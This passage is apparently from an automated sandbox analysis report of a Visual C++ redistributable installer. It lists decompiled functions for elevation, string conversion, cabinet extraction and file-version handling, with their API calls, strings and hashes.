				signed int _v8;
				void* __ecx;
				intOrPtr* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t43;
				void* _t57;
				intOrPtr _t58;
				void* _t60;
				void* _t61;
				void* _t64;

				_v8 = _v8 | 0xffffffff;
				_t58 = _a4;
				_t18 =  *((intOrPtr*)(_t58 + 0xc8));
				_t61 = E000BD58B(_t58 + 0xb8, 1,  *((intOrPtr*)( *_t18 + 0x74))(_t18, _t57, _t60, _t43));
				if(_t61 >= 0) {
					_push(__ebx);
					_t41 = _t58 + 0x4a0;
					if(E000C4B96(_t58 + 0x4a0, __edx, _t58 + 0x4a0, _t58 + 0x4a4) >= 0) {
						_t25 = E000C4CE8(_t41, 1,  &_v8); // executed
						if(_t25 >= 0) {
							_push(0x2000000a);
							_push(2); // executed
							E000B550F(); // executed
							while(1) {
								_t27 = E000C4ED2( *((intOrPtr*)(_t58 + 0x49c)), _t41, 1, _a8); // executed
								_t64 = _t27;
								if(_t64 >= 0) {
									break;
								}
								if(_t64 != 0x800704c7) {
									L13:
									if(_t64 < 0) {
										goto L14;
									}
								} else {
									_t64 = 0x80070642;
									if(E000BD742(0x80070642,  *((intOrPtr*)(_t58 + 0xc8)), 0, 0, 0x80070642, 0, 0x15, 0) == 4) {
										continue;
									} else {
										L14:
										_push("Failed to elevate.");
										goto L16;
									}
								}
								goto L17;
							}
							_push(0x2000000b);
							_push(2); // executed
							E000B550F(); // executed
							_t29 = E000C52E3(_t41); // executed
							_t64 = _t29;
							if(_t64 < 0) {
								_push("Failed to connect to elevated child process.");
								goto L16;
							} else {
								_push(0x2000000c);
								_push(2); // executed
								E000B550F(); // executed
								goto L13;
							}
						} else {
							_push("Failed to create pipe and cache pipe.");
							goto L16;
						}
					} else {
						_push("Failed to create pipe name and client token.");
						L16:
						_push(_t64);
						E000F012F();
					}
					L17:
				} else {
					E000B37D3(_t21, "elevation.cpp", 0x100, _t61);
					_push("UX aborted elevation requirement.");
					_push(_t61);
					E000F012F();
				}
				if(_v8 != 0) {
					CloseHandle(_v8);
					_v8 = _v8 & 0x00000000;
				}
				if(_t64 < 0) {
					E000C4B2B(_t58 + 0x4a0);
				}
				return _t64;
			}















                                                                          0x000cd20a
                                                                          0x000cd210
                                                                          0x000cd213
                                                                          0x000cd22e
                                                                          0x000cd232
                                                                          0x000cd256
                                                                          0x000cd25e
                                                                          0x000cd26e
                                                                          0x000cd281
                                                                          0x000cd28a
                                                                          0x000cd296
                                                                          0x000cd29b
                                                                          0x000cd29d
                                                                          0x000cd2a4
                                                                          0x000cd2b0
                                                                          0x000cd2b5
                                                                          0x000cd2b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000cd2c1
                                                                          0x000cd30d
                                                                          0x000cd30f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000cd2c3
                                                                          0x000cd2d7
                                                                          0x000cd2e1
                                                                          0x00000000
                                                                          0x000cd2e3
                                                                          0x000cd311
                                                                          0x000cd311
                                                                          0x00000000
                                                                          0x000cd311
                                                                          0x000cd2e1
                                                                          0x00000000
                                                                          0x000cd2c1
                                                                          0x000cd2e5
                                                                          0x000cd2ea
                                                                          0x000cd2ec
                                                                          0x000cd2f4
                                                                          0x000cd2f9
                                                                          0x000cd2fd
                                                                          0x000cd318
                                                                          0x00000000
                                                                          0x000cd2ff
                                                                          0x000cd2ff
                                                                          0x000cd304
                                                                          0x000cd306
                                                                          0x00000000
                                                                          0x000cd30c
                                                                          0x000cd28c
                                                                          0x000cd28c
                                                                          0x00000000
                                                                          0x000cd28c
                                                                          0x000cd270
                                                                          0x000cd270
                                                                          0x000cd31d
                                                                          0x000cd31d
                                                                          0x000cd31e
                                                                          0x000cd324
                                                                          0x000cd325
                                                                          0x000cd234
                                                                          0x000cd23f
                                                                          0x000cd244
                                                                          0x000cd249
                                                                          0x000cd24a
                                                                          0x000cd250
                                                                          0x000cd32a
                                                                          0x000cd32f
                                                                          0x000cd335
                                                                          0x000cd335
                                                                          0x000cd33b
                                                                          0x000cd344
                                                                          0x000cd344
                                                                          0x000cd350

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000001,000FB4F0,?,00000001,000000FF,?,?,76B6A770,00000000,00000001,00000000,?,000C72F3), ref: 000CD32F
                                                                          Strings
                                                                          • UX aborted elevation requirement., xrefs: 000CD244
                                                                          • Failed to connect to elevated child process., xrefs: 000CD318
                                                                          • elevation.cpp, xrefs: 000CD23A
                                                                          • Failed to create pipe and cache pipe., xrefs: 000CD28C
                                                                          • Failed to elevate., xrefs: 000CD311
                                                                          • Failed to create pipe name and client token., xrefs: 000CD270
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                          • API String ID: 2962429428-3003415917
                                                                          • Opcode ID: 07ece0e029765fd1fe5752fc55bdb072049003057123b2b744ecf9a313f0f1e4
                                                                          • Instruction ID: ffd5847487f7b05e97d13485f3af8937b4b9ccc6a0d922f84157ddd4eeb7f84d
                                                                          • Opcode Fuzzy Hash: 07ece0e029765fd1fe5752fc55bdb072049003057123b2b744ecf9a313f0f1e4
                                                                          • Instruction Fuzzy Hash: BE31EB72B45662BBE72557609C46FEF775CAF00721F10016FF905A71C3DB91AE0082A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B2436 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 118COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 28%
                                                                          			E000B2436(signed int __edx, intOrPtr* _a4, short* _a8, signed int _a12, int _a16) {
				signed int _t16;
				int _t17;
				signed int _t18;
				signed short _t22;
				intOrPtr _t23;
				intOrPtr* _t25;
				signed short _t28;
				int _t31;
				short* _t40;
				void* _t41;
				intOrPtr _t43;
				int _t45;
				signed int _t48;
				int _t50;
				int _t52;
				intOrPtr* _t53;

				_t39 = _a4;
				_t45 = __edx | 0xffffffff;
				_t16 = _a12;
				_t31 = 0;
				_t52 = 0;
				_t48 = _t16;
				if( *_a4 == 0) {
					L4:
					_t40 = _a8;
					if(_t16 != 0) {
						if(0 == _t40[_t16]) {
							_t7 = _t16 - 1; // 0xca1ac
							_t48 = _t7;
						}
						L11:
						_t8 = _t48 + 1; // 0xca1ad
						_t17 = _t8;
						if(_t52 >= _t17) {
							L20:
							_t18 = _a12;
							_push(_t31);
							_push(_t31);
							_push(_t52);
							_t53 = _a4;
							_push( *_t53);
							_t41 = 0xffffffff;
							_t19 =  ==  ? _t41 : _t18;
							if(WideCharToMultiByte(_a16, _t31, _a8,  ==  ? _t41 : _t18, ??, ??, ??, ??) != 0) {
								 *(_t48 +  *_t53) = _t31;
								L23:
								return _t31;
							}
							_t22 = GetLastError();
							_t35 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
							_t23 = 0x80004005;
							_t31 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
							_push(_t31);
							_push(0x1de);
							L7:
							_push("strutil.cpp");
							E000B37D3(_t23);
							goto L23;
						}
						_t52 = _t17;
						if(_t52 < 0x7fffffff) {
							_t25 = _a4;
							_push(1);
							_push(_t52);
							if( *_t25 == _t31) {
								_t23 = E000B38D4(); // executed
							} else {
								_push( *_t25);
								_t23 = E000B3A72();
							}
							_t43 = _t23;
							if(_t43 != 0) {
								 *_a4 = _t43;
								goto L20;
							} else {
								_t31 = 0x8007000e;
								_push(0x8007000e);
								_push(0x1d7);
								goto L7;
							}
						}
						_t31 = 0x8007000e;
						goto L23;
					}
					_t50 = WideCharToMultiByte(_a16, _t31, _t40, _t45, _t31, _t31, _t31, _t31);
					if(_t50 != 0) {
						_t48 = _t50 - 1;
						goto L11;
					}
					_t28 = GetLastError();
					_t38 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
					_t23 = 0x80004005;
					_t31 =  >=  ? 0x80004005 :  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
					_push(_t31);
					_push(0x1bc);
					goto L7;
				}
				_t52 = E000B3B51( *_t39);
				_t45 = _t45 | 0xffffffff;
				if(_t52 != _t45) {
					_t16 = _t48;
					goto L4;
				}
				_t31 = 0x80070057;
				goto L23;
			}



















                                                                          0x000b2439
                                                                          0x000b243c
                                                                          0x000b243f
                                                                          0x000b2444
                                                                          0x000b2446
                                                                          0x000b2449
                                                                          0x000b244d
                                                                          0x000b246b
                                                                          0x000b246b
                                                                          0x000b2470
                                                                          0x000b24c4
                                                                          0x000b24c6
                                                                          0x000b24c6
                                                                          0x000b24c6
                                                                          0x000b24c9
                                                                          0x000b24c9
                                                                          0x000b24c9
                                                                          0x000b24ce
                                                                          0x000b2514
                                                                          0x000b2514
                                                                          0x000b2519
                                                                          0x000b251a
                                                                          0x000b251b
                                                                          0x000b251c
                                                                          0x000b251f
                                                                          0x000b2523
                                                                          0x000b2524
                                                                          0x000b2537
                                                                          0x000b2564
                                                                          0x000b2567
                                                                          0x000b256d
                                                                          0x000b256d
                                                                          0x000b2539
                                                                          0x000b254a
                                                                          0x000b254d
                                                                          0x000b2554
                                                                          0x000b2557
                                                                          0x000b2558
                                                                          0x000b24ac
                                                                          0x000b24ac
                                                                          0x000b24b1
                                                                          0x00000000
                                                                          0x000b24b1
                                                                          0x000b24d0
                                                                          0x000b24d8
                                                                          0x000b24e4
                                                                          0x000b24e7
                                                                          0x000b24e9
                                                                          0x000b24ec
                                                                          0x000b24f7
                                                                          0x000b24ee
                                                                          0x000b24ee
                                                                          0x000b24f0
                                                                          0x000b24f0
                                                                          0x000b24fc
                                                                          0x000b2500
                                                                          0x000b2512
                                                                          0x00000000
                                                                          0x000b2502
                                                                          0x000b2502
                                                                          0x000b2507
                                                                          0x000b2508
                                                                          0x00000000
                                                                          0x000b2508
                                                                          0x000b2500
                                                                          0x000b24da
                                                                          0x00000000
                                                                          0x000b24da
                                                                          0x000b2482
                                                                          0x000b2486
                                                                          0x000b24bb
                                                                          0x00000000
                                                                          0x000b24bb
                                                                          0x000b2488
                                                                          0x000b2499
                                                                          0x000b249c
                                                                          0x000b24a3
                                                                          0x000b24a6
                                                                          0x000b24a7
                                                                          0x00000000
                                                                          0x000b24a7
                                                                          0x000b2456
                                                                          0x000b2458
                                                                          0x000b245d
                                                                          0x000b2469
                                                                          0x00000000
                                                                          0x000b2469
                                                                          0x000b245f
                                                                          0x00000000

                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(000EFEE7,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000EFEE7,000CA1AD,00000000,00000000), ref: 000B247C
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000EFEE7,000CA1AD,00000000,00000000,0000FDE9), ref: 000B2488
                                                                            • Part of subcall function 000B3B51: GetProcessHeap.KERNEL32(00000000,?,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?), ref: 000B3B59
                                                                            • Part of subcall function 000B3B51: HeapSize.KERNEL32(00000000,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511), ref: 000B3B60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 3662877508-569070560
                                                                          • Opcode ID: 1257e87b4a76c53484ebdc27ca11c8129d05a64b9d11d5dbcb656f3e06d2213b
                                                                          • Instruction ID: b4413e4a60c937dff672c32669032bea97fc4c367c99d7944658ea7d8538b39c
                                                                          • Opcode Fuzzy Hash: 1257e87b4a76c53484ebdc27ca11c8129d05a64b9d11d5dbcb656f3e06d2213b
                                                                          • Instruction Fuzzy Hash: 6731A071200719AFFB21AE69CC94AFB72DDEB44764B204229F915DB5A0EB75CC40DB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D07E4 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
                                                                          			E000D07E4(signed int __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				union _LARGE_INTEGER* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _t32;
				signed short _t36;
				signed short _t41;
				signed short _t42;
				void* _t46;
				union _LARGE_INTEGER _t52;
				signed int _t55;
				signed int _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				signed short _t64;

				_t55 =  *0x11aac0; // 0x0
				_t61 = 0;
				_v16 = 0;
				_v12 = 0;
				_t60 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t55 * 4)) + 4));
				_t32 = _a12;
				if(_t32 == 0) {
					asm("cdq");
					_t56 = __edx;
					_t52 = _a8.LowPart +  *((intOrPtr*)(_t60 + 8));
					asm("adc ecx, [edi+0xc]");
					goto L7;
				} else {
					_t46 = _t32 - 1;
					if(_t46 == 0) {
						asm("cdq");
						_t52 = _a8.LowPart;
						_t56 = __edx;
						goto L7;
					} else {
						if(_t46 == 1) {
							_t56 =  *(_t60 + 0x14);
							asm("adc ecx, [edi+0xc]");
							asm("cdq");
							_t52 =  *((intOrPtr*)(_t60 + 0x10)) +  *((intOrPtr*)(_t60 + 8)) + _a8.LowPart;
							asm("adc ecx, edx");
							L7:
							_v8 = _t56;
							_t36 = E000D11CF(__eflags, _t60 + 0x1c, _a4, _t52, _t56,  &_v16, _a12);
							__eflags = _t36;
							if(_t36 == 0) {
								L10:
								_t25 =  &_v16;
								 *_t25 = _v16 -  *((intOrPtr*)(_t60 + 8));
								__eflags =  *_t25;
							} else {
								_push(_a12);
								_t41 = SetFilePointerEx(_a4, _t52, _v8,  &_v16); // executed
								__eflags = _t41;
								if(_t41 != 0) {
									goto L10;
								} else {
									_t42 = GetLastError();
									__eflags = _t42;
									_t64 =  <=  ? _t42 : _t42 & 0x0000ffff | 0x80070000;
									__eflags = _t64;
									_t61 =  >=  ? 0x80004005 : _t64;
									E000B37D3(0x80004005, "cabextract.cpp", 0x345, _t61);
									E000F012F(_t61, "Failed to move file pointer 0x%x bytes.", _a8);
								}
							}
						} else {
							_t61 = 0x80070057;
							_push("Invalid seek type.");
							E000F012F();
							_t56 = 0x80070057;
						}
					}
				}
				 *((intOrPtr*)(_t60 + 0x30)) = _t61;
				_t39 =  <  ? _t56 | 0xffffffff : _v16;
				return  <  ? _t56 | 0xffffffff : _v16;
			}

















                                                                          0x000d07ea
                                                                          0x000d07fc
                                                                          0x000d07fe
                                                                          0x000d0801
                                                                          0x000d0804
                                                                          0x000d080d
                                                                          0x000d080f
                                                                          0x000d0855
                                                                          0x000d0858
                                                                          0x000d085a
                                                                          0x000d085d
                                                                          0x00000000
                                                                          0x000d0811
                                                                          0x000d0811
                                                                          0x000d0814
                                                                          0x000d084b
                                                                          0x000d084c
                                                                          0x000d084e
                                                                          0x00000000
                                                                          0x000d0816
                                                                          0x000d0819
                                                                          0x000d083b
                                                                          0x000d083e
                                                                          0x000d0841
                                                                          0x000d0842
                                                                          0x000d0844
                                                                          0x000d0860
                                                                          0x000d0866
                                                                          0x000d0873
                                                                          0x000d0878
                                                                          0x000d087a
                                                                          0x000d08d5
                                                                          0x000d08d8
                                                                          0x000d08d8
                                                                          0x000d08d8
                                                                          0x000d087c
                                                                          0x000d087c
                                                                          0x000d088a
                                                                          0x000d0890
                                                                          0x000d0892
                                                                          0x00000000
                                                                          0x000d0894
                                                                          0x000d0894
                                                                          0x000d08a3
                                                                          0x000d08a5
                                                                          0x000d08ad
                                                                          0x000d08af
                                                                          0x000d08bd
                                                                          0x000d08cb
                                                                          0x000d08d0
                                                                          0x000d0892
                                                                          0x000d081b
                                                                          0x000d081b
                                                                          0x000d0820
                                                                          0x000d0826
                                                                          0x000d082c
                                                                          0x000d082c
                                                                          0x000d0819
                                                                          0x000d0814
                                                                          0x000d08db
                                                                          0x000d08e8
                                                                          0x000d08ef

                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 000D088A
                                                                          • GetLastError.KERNEL32(?,?,?), ref: 000D0894
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                          • API String ID: 2976181284-1358093670
                                                                          • Opcode ID: 28c98f2ac2048347112e222899a84ad1b2e1cb8c6fe864796d61148b448cf8bf
                                                                          • Instruction ID: f423fa74f340557edaa3e4eb3f505ade31b54c63664e1c66ae769788d5f7e6d5
                                                                          • Opcode Fuzzy Hash: 28c98f2ac2048347112e222899a84ad1b2e1cb8c6fe864796d61148b448cf8bf
                                                                          • Instruction Fuzzy Hash: 67318471A40619FFDB14DF69CC84AA9B7A9FF04720F00822AF91997751DB71E910DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F4932 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 94memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E000F4932(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				void* _v8;
				char _v12;
				char _v16;
				long _t15;
				char* _t18;
				long _t25;
				intOrPtr _t28;
				void* _t31;
				int _t32;

				_t15 =  &_v8;
				_push(_t15);
				_push(_a4);
				_t32 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				L000F94F0(); // executed
				_t25 = _t15;
				if(_t25 != 0) {
					L4:
					_t16 = GlobalAlloc(0, _t25);
					_t31 = _t16;
					if(_t31 != 0) {
						_push(_t31);
						_push(_t25);
						_push(_v8);
						_push(_a4);
						L000F9500(); // executed
						if(_t16 != 0) {
							L10:
							_push( &_v16);
							_t18 =  &_v12;
							_push(_t18);
							_push("\\");
							_push(_t31);
							L000F9510();
							if(_t18 != 0) {
								L13:
								_t28 = _v12;
								 *_a8 =  *((intOrPtr*)(_t28 + 8));
								 *_a12 =  *((intOrPtr*)(_t28 + 0xc));
							} else {
								_t32 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
								if(_t32 >= 0) {
									goto L13;
								} else {
									_push(_t32);
									_push(0x122);
									goto L9;
								}
							}
						} else {
							_t32 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
							if(_t32 >= 0) {
								goto L10;
							} else {
								_push(_t32);
								_push(0x11d);
								L9:
								_push("fileutil.cpp");
								E000B37D3(_t22);
							}
						}
						GlobalFree(_t31);
					} else {
						_t32 = 0x8007000e;
						_push(0x8007000e);
						_push(0x119);
						goto L3;
					}
				} else {
					_t32 =  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
					if(_t32 >= 0) {
						goto L4;
					} else {
						_push(_t32);
						_push(0x115);
						L3:
						_push("fileutil.cpp");
						E000B37D3(_t16);
					}
				}
				return _t32;
			}












                                                                          0x000f493b
                                                                          0x000f4940
                                                                          0x000f4941
                                                                          0x000f4944
                                                                          0x000f4946
                                                                          0x000f4949
                                                                          0x000f494c
                                                                          0x000f494f
                                                                          0x000f4954
                                                                          0x000f4958
                                                                          0x000f4987
                                                                          0x000f4989
                                                                          0x000f498f
                                                                          0x000f4993
                                                                          0x000f49a2
                                                                          0x000f49a3
                                                                          0x000f49a4
                                                                          0x000f49a7
                                                                          0x000f49aa
                                                                          0x000f49b1
                                                                          0x000f49dd
                                                                          0x000f49e0
                                                                          0x000f49e1
                                                                          0x000f49e4
                                                                          0x000f49e5
                                                                          0x000f49ea
                                                                          0x000f49eb
                                                                          0x000f49f2
                                                                          0x000f4a14
                                                                          0x000f4a14
                                                                          0x000f4a1d
                                                                          0x000f4a25
                                                                          0x000f49f4
                                                                          0x000f4a05
                                                                          0x000f4a0a
                                                                          0x00000000
                                                                          0x000f4a0c
                                                                          0x000f4a0c
                                                                          0x000f4a0d
                                                                          0x00000000
                                                                          0x000f4a0d
                                                                          0x000f4a0a
                                                                          0x000f49b3
                                                                          0x000f49c4
                                                                          0x000f49c9
                                                                          0x00000000
                                                                          0x000f49cb
                                                                          0x000f49cb
                                                                          0x000f49cc
                                                                          0x000f49d1
                                                                          0x000f49d1
                                                                          0x000f49d6
                                                                          0x000f49d6
                                                                          0x000f49c9
                                                                          0x000f4a28
                                                                          0x000f4995
                                                                          0x000f4995
                                                                          0x000f499a
                                                                          0x000f499b
                                                                          0x00000000
                                                                          0x000f499b
                                                                          0x000f495a
                                                                          0x000f496b
                                                                          0x000f4970
                                                                          0x00000000
                                                                          0x000f4972
                                                                          0x000f4972
                                                                          0x000f4973
                                                                          0x000f4978
                                                                          0x000f4978
                                                                          0x000f497d
                                                                          0x000f497d
                                                                          0x000f4970
                                                                          0x000f4a36

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000F495A
                                                                          • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000F4989
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 000F49B3
                                                                          • GetLastError.KERNEL32(00000000,000FB790,?,?,?,00000000,00000000,00000000), ref: 000F49F4
                                                                          • GlobalFree.KERNEL32 ref: 000F4A28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Global$AllocFree
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1145190524-2299628883
                                                                          • Opcode ID: 166e4397dab7b35d87f76c09be507d8a04e7b3e7940850cd89329f50520e83f4
                                                                          • Instruction ID: 8fe2ffe638b8a602227687bc4cc0e5ebafb529dbdee73b02c865ab5950542c8f
                                                                          • Opcode Fuzzy Hash: 166e4397dab7b35d87f76c09be507d8a04e7b3e7940850cd89329f50520e83f4
                                                                          • Instruction Fuzzy Hash: D221E535A4032DABD7219BA58C44EFFBBA8EF80360F004126FE05E7601DB74CD00EAA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B7203 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 42%
                                                                          			E000B7203(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t29;
				void* _t37;
				char* _t38;
				signed int _t46;
				void* _t49;

				_t41 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				EnterCriticalSection(_a4);
				_t29 = E000B5C87(_t41, _a4, _a8,  &_v12);
				_t46 = _v12;
				_t49 = _t29;
				if(_t49 < 0 ||  *((intOrPtr*)(_t46 + 0x18)) != 0) {
					if(_t49 == 0x80070490) {
						goto L18;
					}
					if(_t49 >= 0) {
						if( *((intOrPtr*)(_t46 + 0x18)) != 2 ||  *((intOrPtr*)(_t46 + 0x2c)) != 0 ||  *((intOrPtr*)(_t46 + 0x24)) != 0) {
							_t24 = _t46 + 8; // 0x8
							_t49 = E000D00E0(_t24, _a12);
							if(_t49 >= 0) {
								goto L18;
							}
							_push(_a8);
							_push("Failed to get value as string for variable: %ls");
							L17:
							_push(_t49);
							E000F012F();
						} else {
							_t16 = _t46 + 8; // 0x8
							_t49 = E000D00E0(_t16,  &_v8);
							if(_t49 >= 0) {
								_t37 = E000B567D(_a4, _v8, _a12, 0, 0); // executed
								_t49 = _t37;
								if(_t49 < 0) {
									_t38 = L"*****";
									if( *((intOrPtr*)(_t46 + 0x20)) == 0) {
										_t38 =  *(_t46 + 8);
									}
									_push(_a8);
									E000F012F(_t49, "Failed to format value \'%ls\' of variable: %ls", _t38);
								}
							} else {
								_push("Failed to get unformatted string.");
								_push(_t49);
								E000F012F();
							}
						}
						goto L18;
					}
					_push(_a8);
					_push("Failed to get variable: %ls");
					goto L17;
				} else {
					_t49 = 0x80070490;
					L18:
					LeaveCriticalSection(_a4);
					E000B2793(_v8);
					return _t49;
				}
			}










                                                                          0x000b7203
                                                                          0x000b7206
                                                                          0x000b7207
                                                                          0x000b7208
                                                                          0x000b720c
                                                                          0x000b7215
                                                                          0x000b7225
                                                                          0x000b722a
                                                                          0x000b722d
                                                                          0x000b7231
                                                                          0x000b7249
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b7251
                                                                          0x000b7264
                                                                          0x000b72d1
                                                                          0x000b72da
                                                                          0x000b72de
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b72e0
                                                                          0x000b72e3
                                                                          0x000b72e8
                                                                          0x000b72e8
                                                                          0x000b72e9
                                                                          0x000b7272
                                                                          0x000b7275
                                                                          0x000b727f
                                                                          0x000b7283
                                                                          0x000b72a1
                                                                          0x000b72a6
                                                                          0x000b72aa
                                                                          0x000b72b0
                                                                          0x000b72b5
                                                                          0x000b72b7
                                                                          0x000b72b7
                                                                          0x000b72ba
                                                                          0x000b72c4
                                                                          0x000b72c9
                                                                          0x000b7285
                                                                          0x000b7285
                                                                          0x000b728a
                                                                          0x000b728b
                                                                          0x000b7291
                                                                          0x000b7283
                                                                          0x00000000
                                                                          0x000b7264
                                                                          0x000b7253
                                                                          0x000b7256
                                                                          0x00000000
                                                                          0x000b7239
                                                                          0x000b7239
                                                                          0x000b72f1
                                                                          0x000b72f4
                                                                          0x000b72fd
                                                                          0x000b7309
                                                                          0x000b7309

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,000B583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 000B7215
                                                                          • LeaveCriticalSection.KERNEL32(00000000,00000000,00000002,00000000,?,?,?,000B583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 000B72F4
                                                                          Strings
                                                                          • *****, xrefs: 000B72B0, 000B72BD
                                                                          • Failed to get value as string for variable: %ls, xrefs: 000B72E3
                                                                          • Failed to format value '%ls' of variable: %ls, xrefs: 000B72BE
                                                                          • Failed to get variable: %ls, xrefs: 000B7256
                                                                          • Failed to get unformatted string., xrefs: 000B7285
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
